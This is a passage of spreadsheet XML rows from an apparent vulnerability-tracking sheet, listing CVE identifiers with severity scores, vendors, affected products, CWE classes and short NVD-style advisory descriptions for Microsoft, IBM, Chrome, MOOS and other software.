      <c r="E1023" s="5" t="inlineStr"/>
      <c r="F1023" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1023" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1023" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1023" s="5" t="inlineStr"/>
      <c r="K1023" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1023" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81955</t>
        </is>
      </c>
      <c r="C1024" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1024" s="5" t="inlineStr"/>
      <c r="F1024" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1024" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1024" s="5" t="inlineStr"/>
      <c r="I1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1024" s="5" t="inlineStr"/>
      <c r="K1024" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1024" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81996</t>
        </is>
      </c>
      <c r="C1025" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1025" s="5" t="inlineStr"/>
      <c r="F1025" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1025" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1025" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1025" s="5" t="inlineStr"/>
      <c r="K1025" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1025" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82089</t>
        </is>
      </c>
      <c r="C1026" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1026" s="5" t="inlineStr"/>
      <c r="F1026" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="inlineStr"/>
      <c r="I1026" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1026" s="5" t="inlineStr"/>
      <c r="K1026" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1026" s="5" t="inlineStr">
        <is>
          <t>The wallabag (aka fr.gaulupeau.apps.InThePoche) application through 2.6.0 for Android allows XSS because /api/entries data is loaded into a WebView.</t>
        </is>
      </c>
      <c r="M1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82089</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82092</t>
        </is>
      </c>
      <c r="C1027" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1027" s="5" t="inlineStr"/>
      <c r="F1027" s="5" t="inlineStr"/>
      <c r="G1027" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1027" s="5" t="inlineStr"/>
      <c r="I1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L1027" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information due to an absolute-path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82092</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82095</t>
        </is>
      </c>
      <c r="C1028" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1028" s="5" t="inlineStr"/>
      <c r="F1028" s="5" t="inlineStr"/>
      <c r="G1028" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1028" s="5" t="inlineStr"/>
      <c r="I1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1028" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82095</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82097</t>
        </is>
      </c>
      <c r="C1029" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1029" s="5" t="inlineStr"/>
      <c r="F1029" s="5" t="inlineStr"/>
      <c r="G1029" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1029" s="5" t="inlineStr"/>
      <c r="I1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1029" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to a Server-Side Request Forgery (SSRF) vulnerability.</t>
        </is>
      </c>
      <c r="M1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82097</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82098</t>
        </is>
      </c>
      <c r="C1030" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1030" s="5" t="inlineStr"/>
      <c r="F1030" s="5" t="inlineStr"/>
      <c r="G1030" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1030" s="5" t="inlineStr"/>
      <c r="I1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1030" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82098</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82099</t>
        </is>
      </c>
      <c r="C1031" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1031" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1031" s="5" t="inlineStr"/>
      <c r="F1031" s="5" t="inlineStr"/>
      <c r="G1031" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1031" s="5" t="inlineStr"/>
      <c r="I1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1031" s="5" t="inlineStr"/>
      <c r="K1031" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1031" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82099</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82641</t>
        </is>
      </c>
      <c r="C1032" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1032" s="5" t="inlineStr"/>
      <c r="F1032" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="inlineStr"/>
      <c r="I1032" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1032" s="5" t="inlineStr">
        <is>
          <t>Keploy versions 3.1.0 through 3.6.25, fixed in 3.6.26, bind the agent control-plane HTTP server to all interfaces without authentication, exposing endpoints that stream TLS session keys and traffic data. Attackers can access the /agent/pcap/keylog endpoint to retrieve NSS keylog lines and decrypt recorded TLS traffic, or invoke /agent/stop and /agent/storemocks to manipulate recording sessions.</t>
        </is>
      </c>
      <c r="M1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82641</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="C1033" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1033" s="5" t="inlineStr"/>
      <c r="F1033" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1033" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H10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33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1033" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="C1034" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1034" s="5" t="inlineStr"/>
      <c r="F1034" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1034" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H103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34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1034" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83998</t>
        </is>
      </c>
      <c r="C1035" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1035" s="5" t="inlineStr"/>
      <c r="F1035" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="inlineStr"/>
      <c r="I1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1035" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84187</t>
        </is>
      </c>
      <c r="C1036" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1036" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1036" s="5" t="inlineStr"/>
      <c r="F1036" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="inlineStr"/>
      <c r="I1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1036" s="5" t="inlineStr">
        <is>
          <t>AVideo contains a missing authentication vulnerability in plugin/Live/on_publish.php that allows unauthenticated attackers to mark arbitrary scheduled broadcasts as failed by sending crafted POST requests with schedule identifiers. Attackers can exploit the unguarded RTMP callback endpoint to modify scheduled broadcast status fields by supplying fabricated stream keys matching the pattern -ps-&lt;N&gt;, silently canceling any scheduled live broadcast without credentials or authorization.</t>
        </is>
      </c>
      <c r="M1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84187</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84889</t>
        </is>
      </c>
      <c r="C1037" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1037" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1037" s="5" t="inlineStr"/>
      <c r="F1037" s="5" t="inlineStr"/>
      <c r="G1037" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1037" s="5" t="inlineStr"/>
      <c r="I1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1037" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.3 could allow a remote authenticated attacker to execute arbitrary code due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="M1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84889</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85049</t>
        </is>
      </c>
      <c r="C1038" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1038" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1038" s="5" t="inlineStr"/>
      <c r="F1038" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1038" s="5" t="inlineStr">
        <is>
          <t>Use after free in Skia in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85049</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85051</t>
        </is>
      </c>
      <c r="C1039" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1039" s="5" t="inlineStr"/>
      <c r="F1039" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1039" s="5" t="inlineStr">
        <is>
          <t>Type confusion in Compositing in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85051</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85053</t>
        </is>
      </c>
      <c r="C1040" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1040" s="5" t="inlineStr"/>
      <c r="F1040" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="L1040" s="5" t="inlineStr">
        <is>
          <t>Improper resource exposure in CacheStorage in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85053</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85094</t>
        </is>
      </c>
      <c r="C1041" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1041" s="5" t="inlineStr"/>
      <c r="F1041" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="inlineStr"/>
      <c r="I1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="L1041" s="5" t="inlineStr">
        <is>
          <t>The Canva Android App  before 2.376.0 did not restrict the headers returned to an external origin running in a privileged WebView. A threat actor with control of the WebView could access a user’s session.</t>
        </is>
      </c>
      <c r="M1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85094</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85228</t>
        </is>
      </c>
      <c r="C1042" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1042" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1042" s="5" t="inlineStr"/>
      <c r="F1042" s="5" t="inlineStr"/>
      <c r="G1042" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1042" s="5" t="inlineStr"/>
      <c r="I1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1042" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the tensor buffer validation component in Amazon Deep Java Library (DJL) from 0.13.0 through 0.36.0 on all platforms might allow a remote unauthenticated actor to obtain information from adjacent process memory or cause a denial of service via a crafted tensor payload.
To remediate this issue, users should upgrade to version 0.37.0 or above.</t>
        </is>
      </c>
      <c r="M1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85228</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85430</t>
        </is>
      </c>
      <c r="C1043" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1043" s="5" t="inlineStr"/>
      <c r="F1043" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="inlineStr"/>
      <c r="I1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1043" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through 10.0.1 contains an authentication bypass vulnerability in pShare that accepts UDP datagrams from any source and republishes them with the attacker-claimed identity intact. Attackers can send crafted UDP datagrams to pShare input routes to inject messages into the local MOOS community under spoofed identities, or send malformed datagrams to crash the pShare process.</t>
        </is>
      </c>
      <c r="M1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85430</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85432</t>
        </is>
      </c>
      <c r="C1044" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1044" s="5" t="inlineStr"/>
      <c r="F1044" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="inlineStr"/>
      <c r="I1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1044" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate client identity in MOOSDB message processing, allowing authenticated attackers to attribute writes to other clients by supplying arbitrary source identifiers in serialized messages. Attackers can forge message origins and cancel third-party subscriptions by exploiting the disconnect between authenticated connection identity and wire-supplied source attribution.</t>
        </is>
      </c>
      <c r="M1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85432</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85455</t>
        </is>
      </c>
      <c r="C1045" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1045" s="5" t="inlineStr"/>
      <c r="F1045" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="inlineStr"/>
      <c r="I1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1045" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a buffer over-read vulnerability in CMOOSCommPkt where a four-byte packet triggers out-of-bounds memory access during deserialization. Attackers can open a TCP connection to the MOOSDB port and send a crafted short packet to read memory before authentication.</t>
        </is>
      </c>
      <c r="M1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85455</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85677</t>
        </is>
      </c>
